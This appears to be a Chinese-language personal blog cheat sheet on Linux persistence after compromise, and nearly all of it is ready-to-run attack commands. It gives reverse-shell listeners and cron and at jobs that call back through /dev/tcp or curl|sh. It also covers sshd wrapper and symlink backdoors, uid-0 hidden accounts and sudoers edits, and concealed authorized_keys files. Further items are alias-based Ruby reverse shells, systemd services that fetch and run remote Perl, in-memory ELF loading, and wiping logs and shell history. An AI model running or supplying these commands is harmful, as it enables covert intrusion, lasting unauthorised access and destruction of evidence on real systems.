linux持久化

[TOC]

linux持久化笔记 随缘完善更新

tips

##查看机器配置

whoami&&lscpu&&free -h&&df -h&&lsb_release -a

##接shell

1
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880

##别人写的自动化脚本

wget https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh
curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

show payloads
use x

##pty

1
2
which python python2 python3
python3 -c 'import pty;pty.spawn("/bin/bash")'

##痕迹清除

1
2
3
4
sed -i '/^101/d' /var/log/nginx/access.log&
rm -rf /var/log/* & history -c & rm -rf ~/.bash_history

rm -rf /var/log/auth.log /var/log/secure /var/log/faillog /var/log/lastlog /var/log/wtmp

##隐身登陆

1
2
3
4
5
6
ssh username@hostname "bash --noprofile --norc"

ssh -T username@host /bin/bash -i

ssh -o UserKnownHostsFile=/dev/null -T user@hostname
/bin/bash -if

##cf支持的端口

1
2
3
4
5
6
7
8
http端口	https端口
80  	443
8080	2053
8880	2083
2052	2087
2082	2096
2086	8443
2095	

##添账号

1
2
3
4
5
6
7
8
##查看root所在的组
groups root

useradd config
passwd config
usermod -aG sudo config
usermod -aG root config
echo 'config    ALL=(ALL)       ALL' >> /etc/sudoers

0. 内存执行ELF

优点:不落地匿名文件,好用

缺点:可以和其他技术结合起来,比如通过fexecve调用memfd_create创建的匿名文件句柄

demo: https://asciinema.org/a/173715

低版本glibc编译的文件可在高版本执行,低版本glibc编译的

1
2
3
4
5
## 版本
	ldd --version
## ldd (GNU libc) 2.17  ten服务器的版本低
	~/tmp/elfshell-glibc-2.17 kali:8880
	exec.go    ~/elf/exec.pl   ~/tmp/sysConfig.pl    内容是:curl http://xxx/xxx|sh

mes

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# 放在后台。 但如下载文件等操作,执行完后elf会退出,不会循环执行
Ctrl+z 
bg
1 ## 要执行命令的文件 可以替换demoshell,下载+设置ipoprt编译+在攻击机; linux命令用c编译。此文件可任意替换
https://gist.githubusercontent.com/magisterquis/ce8b99b42188f4517efb3e1038a483de/raw/cc9c2f96bc982b82ded64a734aeb850f73fd2f93/demoshell.go
	go build -ldflags '--extldflags "-static -fpic"' -o elfshell ./demoshell.go
2 ## 写入elfload.pl  
cat elfload.pl.head | tee elfload.pl 
文件内容elfload.pl.head
'''
#!/usr/bin/env perl                                                                                                                                    
use warnings;                                                                                                                                          
use strict;                                                                                                                                            
                                                                                                                                                       
$|=1;                                                                                                                                                  
                                                                                                                                                                                                                                                                                 
print "Making anonymous file...";                                                                                                                      
my $name = "";                                                                                                                                         
my $fd = syscall(319, $name, 1);                                                                                                                       
if (-1 == $fd) {                                                                                                                                       
        die "memfd_create: $!";                                                                                                                        
}                                                                                                                                                      
print "fd $fd\n";                                                                                                                                      
                                                                                                                                                                                                                                                                               
open(my $FH, '>&='.$fd) or die "open: $!";                                                                                                             
select((select($FH), $|=1)[0]);                                                                                                                        
                                                                                                                                                                                                                                                        
print "Writing ELF binary to memory..."; 
'''
3 ## elfsehll写进elfload.pl
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' elfshell >> elfload.pl 
4 ## 尾部写入elfload.pl
cat elfload.pl.tail | tee -a elfload.pl 
文件内容elfload.pl.tail
'''
print "done\n";                                                                                                                                        
                                                                                                                                                                                                                                                                                       
print "Here we go...\n";                                                                                                                               
exec {"/proc/$$/fd/$fd"} "formsec"                                                                                    
        or die "exec: $!";  
'''
5 ## exp
curl http://1.1.1.1/elfload.pl|perl

curl http://xxx/xxx.pl|perl

## 接shell
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880

1. ssh wrapper后门

优点:无需编译,只有在连接后有进程

缺点:需要重启sshd

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#####一行vic
cd /usr/sbin/&&mv sshd ../bin/&&echo '#!/usr/bin/perl' >sshd&&echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd&&echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd&&chmod u+x sshd&&/etc/init.d/sshd restart

## vic
cd /usr/sbin/
mv sshd ../bin/

echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd

chmod u+x sshd
/etc/init.d/sshd restart

## att 连接

socat STDIO TCP4:vicIP:22,sourceport=13377

2. ssh 软连接 开后门ssh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
没成功
## new 
	cp /etc/pam.d/su /etc/pam.d/java
	#cp /etc/pam.d/su postgres
	ln -sf /usr/sbin/sshd /java;
	#ln -sf /usr/sbin/sshd /postgres
	/java -oPort=11212
	#/postgres -oPort=5555
	
	
	cp /etc/pam.d/su /etc/pam.d/java
	ln -sf /usr/sbin/sshd /java;
	/java -oPort=11212

## old
ln -sf /usr/sbin/sshd /tmp/su;
/tmp/su -oPort=11212

3. OpenSSH后门制作

4. 计划任务

crontab 文件通常位于以下目录中:

  • /var/spool/cron/crontabs/username(对于基于 Debian/Ubuntu 的系统)
  • /var/spool/cron/tabs/username(对于基于 Red Hat/CentOS 的系统)

普通,部署到当前用户

1
2
3
4
5
6
## 添加进当前用户的crontab文件中
crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/2333 0>&1"; } | crontab -
#使用crontab -l 或cat时有隐藏效果
(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/5555 0>&1;\rno crontab for `whoami`%100c\n")|crontab -

echo ' * */5 * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab

部署到/etc/crontab,5mins端口31337启动ssh守护进程

1
echo ' * */5 * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab

部署到/etc/cron.*/

1
2
3
4
5
##已经kali监听,内容为将“每分钟反弹到443”写进0hourly内+直接反弹到443
echo '*/1 * * * * root curl http://xxx/a|sh' >> /etc/cron.d/man-db

echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/0hourly
echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/man-db

at周期运行 只运行一次。不好用

1
2
3
4
5
6
7
8
echo "at now+1min <<EOF" >> /tmp/...
echo "bash /tmp/..." >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/192.168.44.123/10092 0>&1;" >> /tmp/...

at now+1min <<EOF
bash /tmp/...
EOF

at C2远程,不好用

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
#c2server
echo "at now+1min <<EOF" >> /tmp/...
echo "curl http://xxx/xxx | sh" >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/xxx/8080 0>&1;" >> /tmp/...
python3 -m http.server 80

#victim
at now+1min <<EOF
curl http://xxx/config | sh
EOF
at -f /xx/xx now + 1 minute
echo "curl http://xxx | sh" | at now + 1 minute

5. 后门账户

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
# 删用户
userdel -f xx
#shadow root后门账户 带sudo
useradd -u 0 -o -g root -G root -M -s /bin/bash config && echo "xxx" | passwd config --stdin
passwd config
echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config

#普通权限的后门账户,但是名字有很强的迷惑性,可用于挖矿,botnet等。
useradd -d /x -c "config" -s /bin/bash config -m、
useradd -d /home/... -s /bin/bash x -m

## CentOS 7系统命令行创建uid为0的用户
1. 直接创建
useradd -o -u 0 config && echo "xxx" | passwd config --stdin
2. 写入/root/.bashrc文件。与PROMPT_COMMAND结合,每次以root打开shell时都会执行
echo 'export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 config &>/dev/null && echo config:xxx | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"'>>/root/.bashrc
## Ubuntu系统命令行创建uid为0的用户
useradd -p 0 `openssl passwd -1 -salt 'abc' xxx` -u 0  -o -g root -G root -s /bin/bash config

6. pubKey

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

## 修改/etc/ssh/sshd_config中的AuthorizedKeysFile字段,隐藏真正的公钥
cat /etc/ssh/sshd_config|grep AuthorizedKeysFile
AuthorizedKeysFile    .cache
	echo "AuthorizedKeysFile    .cache" >> /etc/ssh/sshd_config
	echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config

#others_user
mkdir -p ~/.cache
ln /root/.ssh/authorized_keys ~/.cache/ssh.rc

#target_user
mkdir -p ~${target_user}/.cache
echo -e "\n\nxxxxxxx\n\n" >> ~/.cache/ssh.rc

#正常用户的免密公钥也能正常使用,只需要有针对性地维护目标用户

7. 别名后门

优点:隐藏得深 ,但命令或网络情况复杂会延迟,会被发现

缺点:需要机会,对方执行yum更新

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
## ruby实现反弹连接 nc
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"

## ruby实现反弹连接 msf
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end';};alerts"

## 创建alias和unalias的别名,加入隐蔽的位置,执行ls自动反弹  vi /etc/yum/yum-update.rc
cat > /etc/yum/yum-update.rc <<EOF
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias="cat /tmp/.alias.txt"
EOF

将下面的加入/tmp/.alias.txt
cat > /tmp/.alias.txt <<EOF
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias vi='vim'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
EOF

cd /etc/yum/&&touch -acmr version-groups.conf yum-update.rc

## hash后门
#当执行ls时会发现变成执行了pwd
echo "hash -p /usr/bin/pwd ls" >> /etc/profile
## 不好用 echo "hash -p 'useradd -o -u 0 config && echo "'"'"xxx"'"'" | passwd config --stdin' ls" >> /etc/profile

8.systemd服务后门

优点:不看文件不容易被发现

缺点:需要机会

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
不成功
1. ## 系统重启开bash
cat > /usr/lib/systemd/system/config.service <<EOF
[Unit]
Description=Systemctl Config.
After=network.target
[Service]
Type=forking
ExecStart=curl http://xxx/xxx.pl|perl
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable config 
systemctl start config

2. ## 类定时任务
cat > /usr/lib/systemd/system/guard.service <<EOF
[Unit]
Description=guard
After=network.target

[Service]
Type=forking
ExecStart=curl http://xxx/xxx.pl|perl
Restart=always
RestartSec=12s

[Install]
WantedBy=default.target

EOF

systemctl daemon-reload
systemctl enable guard
systemctl start guard 

9. PAM后门制作

Linux Pam后门总结拓展 - 先知社区

10. rootkit

自动化脚本

偷账户密码还是使用PAM后门或者OpenSSH编译后门更为稳定且不易发现

updatedupdated2024-04-212024-04-21